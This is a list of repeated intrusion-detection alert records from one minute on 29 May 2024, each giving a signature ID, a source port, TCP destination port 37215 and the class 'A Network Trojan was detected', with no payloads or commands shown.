                Timestamp:05/29/24-15:15:37.133970
                SID:2835222
                Source Port:34856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555220
                SID:2829579
                Source Port:39190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335117
                SID:2829579
                Source Port:57518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013252
                SID:2835222
                Source Port:40840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560825
                SID:2829579
                Source Port:45236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060992
                SID:2835222
                Source Port:35310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227425
                SID:2829579
                Source Port:55016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520529
                SID:2835222
                Source Port:43382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321292
                SID:2829579
                Source Port:48882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917630
                SID:2829579
                Source Port:35728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023423
                SID:2835222
                Source Port:38810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975885
                SID:2835222
                Source Port:52148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726439
                SID:2835222
                Source Port:45532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528036
                SID:2829579
                Source Port:47264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.882914
                SID:2835222
                Source Port:48528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.851534
                SID:2829579
                Source Port:35390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.237081
                SID:2829579
                Source Port:55548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900402
                SID:2835222
                Source Port:40502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901944
                SID:2835222
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113211
                SID:2835222
                Source Port:35120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419209
                SID:2835222
                Source Port:54498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321225
                SID:2829579
                Source Port:44256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688876
                SID:2829579
                Source Port:45592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778040
                SID:2829579
                Source Port:39026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942845
                SID:2829579
                Source Port:57834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969860
                SID:2835222
                Source Port:51718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814450
                SID:2829579
                Source Port:36990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565970
                SID:2829579
                Source Port:35484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394838
                SID:2835222
                Source Port:59702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985949
                SID:2829579
                Source Port:50362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822052
                SID:2829579
                Source Port:56016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558306
                SID:2835222
                Source Port:58162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783362
                SID:2835222
                Source Port:49760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.473538
                SID:2829579
                Source Port:37304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.515343
                SID:2835222
                Source Port:52698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129157
                SID:2835222
                Source Port:51540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181833
                SID:2829579
                Source Port:43118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583990
                SID:2835222
                Source Port:43520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617336
                SID:2835222
                Source Port:55382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826242
                SID:2835222
                Source Port:56810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416536
                SID:2835222
                Source Port:53222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261516
                SID:2829579
                Source Port:33714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668825
                SID:2829579
                Source Port:39388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013508
                SID:2829579
                Source Port:56764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981257
                SID:2829579
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240301
                SID:2829579
                Source Port:60772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558042
                SID:2829579
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610901
                SID:2835222
                Source Port:53806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440533
                SID:2835222
                Source Port:41368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336123
                SID:2835222
                Source Port:39666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520423
                SID:2835222
                Source Port:33334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941337
                SID:2835222
                Source Port:55712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279476
                SID:2829579
                Source Port:46648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145024
                SID:2835222
                Source Port:53574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898397
                SID:2829579
                Source Port:44710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868201
                SID:2829579
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.862691
                SID:2829579
                Source Port:41094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135493
                SID:2829579
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660430
                SID:2829579
                Source Port:55518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946305
                SID:2835222
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793886
                SID:2835222
                Source Port:43694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326012
                SID:2835222
                Source Port:51492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916380
                SID:2829579
                Source Port:34460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736905
                SID:2829579
                Source Port:44088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265257
                SID:2835222
                Source Port:34818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419794
                SID:2829579
                Source Port:43250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025077
                SID:2829579
                Source Port:47354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277108
                SID:2835222
                Source Port:47580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461897
                SID:2829579
                Source Port:50298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971435
                SID:2835222
                Source Port:49992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782958
                SID:2829579
                Source Port:45762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363206
                SID:2829579
                Source Port:46460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325550
                SID:2835222
                Source Port:32890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175715
                SID:2829579
                Source Port:42284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417672
                SID:2829579
                Source Port:35976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737495
                SID:2829579
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.608252
                SID:2829579
                Source Port:59596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807235
                SID:2829579
                Source Port:54798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184451
                SID:2835222
                Source Port:49620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448514
                SID:2835222
                Source Port:49560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743467
                SID:2829579
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094947
                SID:2835222
                Source Port:58228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262423
                SID:2835222
                Source Port:34256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225657
                SID:2835222
                Source Port:36212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915686
                SID:2829579
                Source Port:60878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.973807
                SID:2835222
                Source Port:53388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521789
                SID:2829579
                Source Port:40678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659623
                SID:2835222
                Source Port:49936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002225
                SID:2835222
                Source Port:55428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034755
                SID:2835222
                Source Port:36114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360323
                SID:2835222
                Source Port:45856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160996
                SID:2829579
                Source Port:47916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724503
                SID:2829579
                Source Port:56956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166317
                SID:2835222
                Source Port:36878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926395
                SID:2835222
                Source Port:53558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169128
                SID:2835222
                Source Port:35166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225404
                SID:2835222
                Source Port:38574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.069770
                SID:2829579
                Source Port:57398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654794
                SID:2829579
                Source Port:56358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499531
                SID:2835222
                Source Port:39552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526215
                SID:2829579
                Source Port:56736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644738
                SID:2835222
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714115
                SID:2829579
                Source Port:53746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873138
                SID:2835222
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.736572
                SID:2835222
                Source Port:45150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455062
                SID:2829579
                Source Port:58970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766159
                SID:2829579
                Source Port:52288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799552
                SID:2835222
                Source Port:50634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155670
                SID:2835222
                Source Port:52376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863043
                SID:2835222
                Source Port:54928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956181
                SID:2835222
                Source Port:53396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365797
                SID:2835222
                Source Port:42694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850111
                SID:2829579
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394775
                SID:2835222
                Source Port:51818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905156
                SID:2835222
                Source Port:37762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362716
                SID:2829579
                Source Port:59284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278184
                SID:2835222
                Source Port:60516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170552
                SID:2835222
                Source Port:36050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668140
                SID:2835222
                Source Port:52722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467401
                SID:2829579
                Source Port:40928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008962
                SID:2835222
                Source Port:60028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950266
                SID:2835222
                Source Port:43258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779503
                SID:2829579
                Source Port:41770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873034
                SID:2829579
                Source Port:37648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141039
                SID:2835222
                Source Port:56140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002139
                SID:2835222
                Source Port:60006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914333
                SID:2829579
                Source Port:58190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871707
                SID:2829579
                Source Port:57300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075061
                SID:2829579
                Source Port:48084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470103
                SID:2835222
                Source Port:48438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.428267
                SID:2829579
                Source Port:58876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899713
                SID:2829579
                Source Port:39138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859558
                SID:2829579
                Source Port:46010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166394
                SID:2829579
                Source Port:45490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184780
                SID:2829579
                Source Port:50874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715159
                SID:2829579
                Source Port:56072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009396
                SID:2835222
                Source Port:44086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552134
                SID:2829579
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264758
                SID:2835222
                Source Port:50954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278261
                SID:2829579
                Source Port:37648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873012
                SID:2835222
                Source Port:33788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226556
                SID:2835222
                Source Port:45378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.714494
                SID:2829579
                Source Port:35926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854046
                SID:2829579
                Source Port:44616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665437
                SID:2835222
                Source Port:37010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975988
                SID:2835222
                Source Port:35808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180181
                SID:2829579
                Source Port:43314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744545
                SID:2835222
                Source Port:56444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224040
                SID:2829579
                Source Port:60250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329041
                SID:2829579
                Source Port:38138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001097
                SID:2835222
                Source Port:50212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841717
                SID:2835222
                Source Port:45028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287660
                SID:2835222
                Source Port:60622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110712
                SID:2829579
                Source Port:42958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899102
                SID:2829579
                Source Port:42994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.817336
                SID:2829579
                Source Port:58848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766311
                SID:2835222
                Source Port:40194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266675
                SID:2829579
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842391
                SID:2835222
                Source Port:40498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.567277
                SID:2835222
                Source Port:51340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009600
                SID:2829579
                Source Port:35578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229975
                SID:2829579
                Source Port:52970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850400
                SID:2835222
                Source Port:45354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437325
                SID:2829579
                Source Port:35994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179928
                SID:2835222
                Source Port:58554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280615
                SID:2835222
                Source Port:36256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816860
                SID:2829579
                Source Port:56972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.740102
                SID:2835222
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.080993
                SID:2829579
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909895
                SID:2829579
                Source Port:51494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558101
                SID:2829579
                Source Port:39312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900331
                SID:2829579
                Source Port:35312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856194
                SID:2835222
                Source Port:37376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624992
                SID:2835222
                Source Port:59578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.694214
                SID:2835222
                Source Port:42494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008313
                SID:2829579
                Source Port:58036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521189
                SID:2829579
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161252
                SID:2829579
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654500
                SID:2835222
                Source Port:43336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331345
                SID:2835222
                Source Port:55832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042778
                SID:2835222
                Source Port:48268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465302
                SID:2829579
                Source Port:59234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.564958
                SID:2835222
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870163
                SID:2835222
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438724
                SID:2829579
                Source Port:55650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228275
                SID:2835222
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925845
                SID:2829579
                Source Port:51518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165088
                SID:2835222
                Source Port:45220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.705043
                SID:2829579
                Source Port:36568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910394
                SID:2835222
                Source Port:44040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783708
                SID:2835222
                Source Port:44078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909744
                SID:2829579
                Source Port:52218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785944
                SID:2835222
                Source Port:34690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335760
                SID:2829579
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023198
                SID:2829579
                Source Port:44610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856341
                SID:2829579
                Source Port:41934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436737
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.268480
